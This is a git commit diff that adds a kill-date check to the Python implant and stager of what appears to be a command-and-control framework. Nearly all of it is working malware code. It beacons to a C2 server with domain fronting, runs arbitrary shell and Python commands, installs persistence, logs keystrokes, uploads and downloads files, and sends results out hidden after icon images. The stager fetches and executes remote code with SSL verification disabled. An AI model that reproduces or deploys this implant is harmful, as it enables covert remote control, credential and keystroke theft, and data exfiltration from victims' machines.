'Added KillDate to Python Implant'

2018-09-04 21:54:03 +01:00 · 2018-09-04 21:54:03 +01:00 · 3f45edcee0
parent 7200fb6505
commit 3f45edcee0
2 changed files with 120 additions and 117 deletions
--- a/Implant.py
+++ b/Implant.py
@ -116,124 +116,125 @@ def decrypt_bytes_gzip( key, data):
  return data

 while(True):
-  # kill date stuff to add here
-  key = "%s"
-  uri = "%s"
-  serverclean = "%s"
-  server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
-  try:
-    time.sleep(timer)
-    ua='%s'
-    if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua})
-    else: req=urllib2.Request(server,headers={'User-agent':ua})
-    res=urllib2.urlopen(req);
-    html = res.read()
-  except Exception as e:
-    E = e
-    #print "error %%s" %% e
-  #print html
-  if html:
+  cstr=time.strftime("%%d/%%m/%%Y",time.gmtime());cstr=time.strptime(cstr,"%%d/%%m/%%Y")
+  if cstr < kd:
+    key = "%s"
+    uri = "%s"
+    serverclean = "%s"
+    server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
    try:
-      returncmd = decrypt( key, html )
-      returncmd = returncmd.rstrip('\\0')
-
-      if "multicmd" in returncmd:
-
-        returncmd = returncmd.replace("multicmd","")
-        returnval = ""
-        split = returncmd.split("!d-3dion@LD!-d")
-
-        for cmd in split:
-          if cmd[:10] == "$sleeptime":
-            timer = int(cmd.replace("$sleeptime = ",""))
-          elif cmd[:13] == "download-file":  
-            fname = cmd.replace("download-file ","")
-            returnval = dfile(fname) 
-          elif cmd[:11] == "upload-file":  
-            fullparams = cmd.replace("upload-file ","")
-            params = fullparams.split(":")
-            returnval = ufile(params[1],params[0]) 
-          elif cmd[:19] == "install-persistence":  
-            returnval = persist() 
-          elif cmd[:14] == "get-keystrokes":  
-            returnval = keylog()
-          elif cmd[:18] == "remove-persistence":  
-            returnval = remove_persist() 
-          elif cmd[:19] == "startanotherimplant":   
-            returnval = sai(delfile=True)
-          elif cmd[:28] == "startanotherimplant-keepfile":
-            returnval = sai()  
-          elif cmd[:10] == "loadmodule":
-            module = cmd.replace("loadmodule","")
-            exec(module)
-            try:
-              import sys
-              import StringIO
-              import contextlib
-              
-              @contextlib.contextmanager
-              def stdoutIO(stdout=None):
-                old = sys.stdout
-                if stdout is None:
-                  stdout = StringIO.StringIO()
-                sys.stdout = stdout
-                yield stdout
-                sys.stdout = old
-
-              with stdoutIO() as s:
-                exec module
-              if s.getvalue():
-                returnval = s.getvalue()
-              else:
-                returnval = "Module loaded"
-            except Exception as e:
-              returnval = "Error with source file: %%s" %% e
-            
-          elif cmd[:6] == "python":
-            module = cmd.replace("python ","")            
-            try:
-              import sys
-              import StringIO
-              import contextlib
-              
-              @contextlib.contextmanager
-              def stdoutIO(stdout=None):
-                old = sys.stdout
-                if stdout is None:
-                  stdout = StringIO.StringIO()
-                sys.stdout = stdout
-                yield stdout
-                sys.stdout = old
-
-              with stdoutIO() as s:
-                exec module
-              
-              returnval = s.getvalue()
-
-            except Exception as e:
-              returnval = "Error with source file: %%s" %% e
-
-          else:
-            try:
-              returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
-            except subprocess.CalledProcessError as exc:
-              returnval = "ErrorCmd: %%s" %% exc.output
-              
-          server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
-          opener = urllib2.build_opener()
-          postcookie = encrypt(key, cmd)
-          data = base64.b64decode(random.choice(icoimage))
-          dataimage = data.ljust( 1500, '\\0' )
-          dataimagebytes = dataimage+(encrypt(key, returnval, gzip=True))
-          if hh: req=urllib2.Request(server,dataimagebytes,headers={'Host':hh,'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie})
-          else: req=urllib2.Request(server,dataimagebytes,headers={'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie})
-          res=urllib2.urlopen(req);
-          response = res.read()
-
+      time.sleep(timer)
+      ua='%s'
+      if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua})
+      else: req=urllib2.Request(server,headers={'User-agent':ua})
+      res=urllib2.urlopen(req);
+      html = res.read()
    except Exception as e:
      E = e
      #print "error %%s" %% e
-      w = \"\"""" % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.ServerURL, self.UserAgent)
+    #print html
+    if html:
+      try:
+        returncmd = decrypt( key, html )
+        returncmd = returncmd.rstrip('\\0')
+  
+        if "multicmd" in returncmd:
+  
+          returncmd = returncmd.replace("multicmd","")
+          returnval = ""
+          split = returncmd.split("!d-3dion@LD!-d")
+  
+          for cmd in split:
+            if cmd[:10] == "$sleeptime":
+              timer = int(cmd.replace("$sleeptime = ",""))
+            elif cmd[:13] == "download-file":  
+              fname = cmd.replace("download-file ","")
+              returnval = dfile(fname) 
+            elif cmd[:11] == "upload-file":  
+              fullparams = cmd.replace("upload-file ","")
+              params = fullparams.split(":")
+              returnval = ufile(params[1],params[0]) 
+            elif cmd[:19] == "install-persistence":  
+              returnval = persist() 
+            elif cmd[:14] == "get-keystrokes":  
+              returnval = keylog()
+            elif cmd[:18] == "remove-persistence":  
+              returnval = remove_persist() 
+            elif cmd[:19] == "startanotherimplant":   
+              returnval = sai(delfile=True)
+            elif cmd[:28] == "startanotherimplant-keepfile":
+              returnval = sai()  
+            elif cmd[:10] == "loadmodule":
+              module = cmd.replace("loadmodule","")
+              exec(module)
+              try:
+                import sys
+                import StringIO
+                import contextlib
+                
+                @contextlib.contextmanager
+                def stdoutIO(stdout=None):
+                  old = sys.stdout
+                  if stdout is None:
+                    stdout = StringIO.StringIO()
+                  sys.stdout = stdout
+                  yield stdout
+                  sys.stdout = old
+  
+                with stdoutIO() as s:
+                  exec module
+                if s.getvalue():
+                  returnval = s.getvalue()
+                else:
+                  returnval = "Module loaded"
+              except Exception as e:
+                returnval = "Error with source file: %%s" %% e
+              
+            elif cmd[:6] == "python":
+              module = cmd.replace("python ","")            
+              try:
+                import sys
+                import StringIO
+                import contextlib
+                
+                @contextlib.contextmanager
+                def stdoutIO(stdout=None):
+                  old = sys.stdout
+                  if stdout is None:
+                    stdout = StringIO.StringIO()
+                  sys.stdout = stdout
+                  yield stdout
+                  sys.stdout = old
+  
+                with stdoutIO() as s:
+                  exec module
+                
+                returnval = s.getvalue()
+  
+              except Exception as e:
+                returnval = "Error with source file: %%s" %% e
+  
+            else:
+              try:
+                returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
+              except subprocess.CalledProcessError as exc:
+                returnval = "ErrorCmd: %%s" %% exc.output
+                
+            server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
+            opener = urllib2.build_opener()
+            postcookie = encrypt(key, cmd)
+            data = base64.b64decode(random.choice(icoimage))
+            dataimage = data.ljust( 1500, '\\0' )
+            dataimagebytes = dataimage+(encrypt(key, returnval, gzip=True))
+            if hh: req=urllib2.Request(server,dataimagebytes,headers={'Host':hh,'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie})
+            else: req=urllib2.Request(server,dataimagebytes,headers={'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie})
+            res=urllib2.urlopen(req);
+            response = res.read()
+
+      except Exception as e:
+        E = e
+        #print "error %%s" %% e
+        w = \"\"""" % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.ServerURL, self.UserAgent)
    self.C2Core = """
 $key="%s"
 $global:sleeptime = '%s'
--- a/Payloads.py
+++ b/Payloads.py
@ -31,7 +31,8 @@ class Payloads(object):
      content = f.read()
      content = content.replace("#REPLACEKEY#","#%s" % self.PythonKey)
      self.PythonHash = hashlib.sha512(content).hexdigest()
-    self.Python = """import urllib2,os,sys,base64,ssl,socket,pwd,hashlib
+    self.Python = """import urllib2,os,sys,base64,ssl,socket,pwd,hashlib,time
+kd=time.strptime("%s","%%d/%%m/%%Y")
 pyhash="%s"
 pykey="%s"
 key="%s"
@ -39,12 +40,13 @@ url="%s"
 url2="%s"
 hh="%s"
 ua="%s"
+cstr=time.strftime("%%d/%%m/%%Y",time.gmtime());cstr=time.strptime(cstr,"%%d/%%m/%%Y")
 ssl._create_default_https_context=ssl._create_unverified_context
 if hh: r=urllib2.Request(url,headers={'Host':hh,'User-agent':ua})
 else: r=urllib2.Request(url,headers={'User-agent':ua})
 res=urllib2.urlopen(r);d=res.read();c=d[1:];b=c.decode("hex") 
 s=hashlib.sha512(b)
-if pykey in b and pyhash == s.hexdigest(): exec(b)
+if pykey in b and pyhash == s.hexdigest() and cstr < kd: exec(b)
 else: sys.exit(0)
 un=pwd.getpwuid( os.getuid() )[ 0 ];pid=os.getpid()
 is64=sys.maxsize > 2**32;arch=('x64' if is64 == True else 'x86')
@ -53,7 +55,7 @@ encsid=encrypt(key, '%%s;%%s;%%s;%%s;%%s;' %% (un,hn,hn,arch,pid))
 if hh:r=urllib2.Request(url2,headers={'Host':hh,'User-agent':ua,'Cookie':'SessionID=%%s' %% encsid})
 else:r=urllib2.Request(url2,headers={'User-agent':ua,'Cookie':'SessionID=%%s' %% encsid})
 res=urllib2.urlopen(r);html=res.read();x=decrypt(key, html).rstrip('\\0');exec(x)
-    """ % (self.PythonHash,self.PythonKey,self.Key,(self.HostnameIP+":"+self.Serverport+"/"+QuickCommand+"_py"),(self.HostnameIP+":"+self.Serverport+self.ConnectURL+"?m"),self.DomainFrontHeader,self.UserAgent)
+    """ % (self.KillDate,self.PythonHash,self.PythonKey,self.Key,(self.HostnameIP+":"+self.Serverport+"/"+QuickCommand+"_py"),(self.HostnameIP+":"+self.Serverport+self.ConnectURL+"?m"),self.DomainFrontHeader,self.UserAgent)
    self.C2Core = """%s
 $sc="%s"
 $s="%s"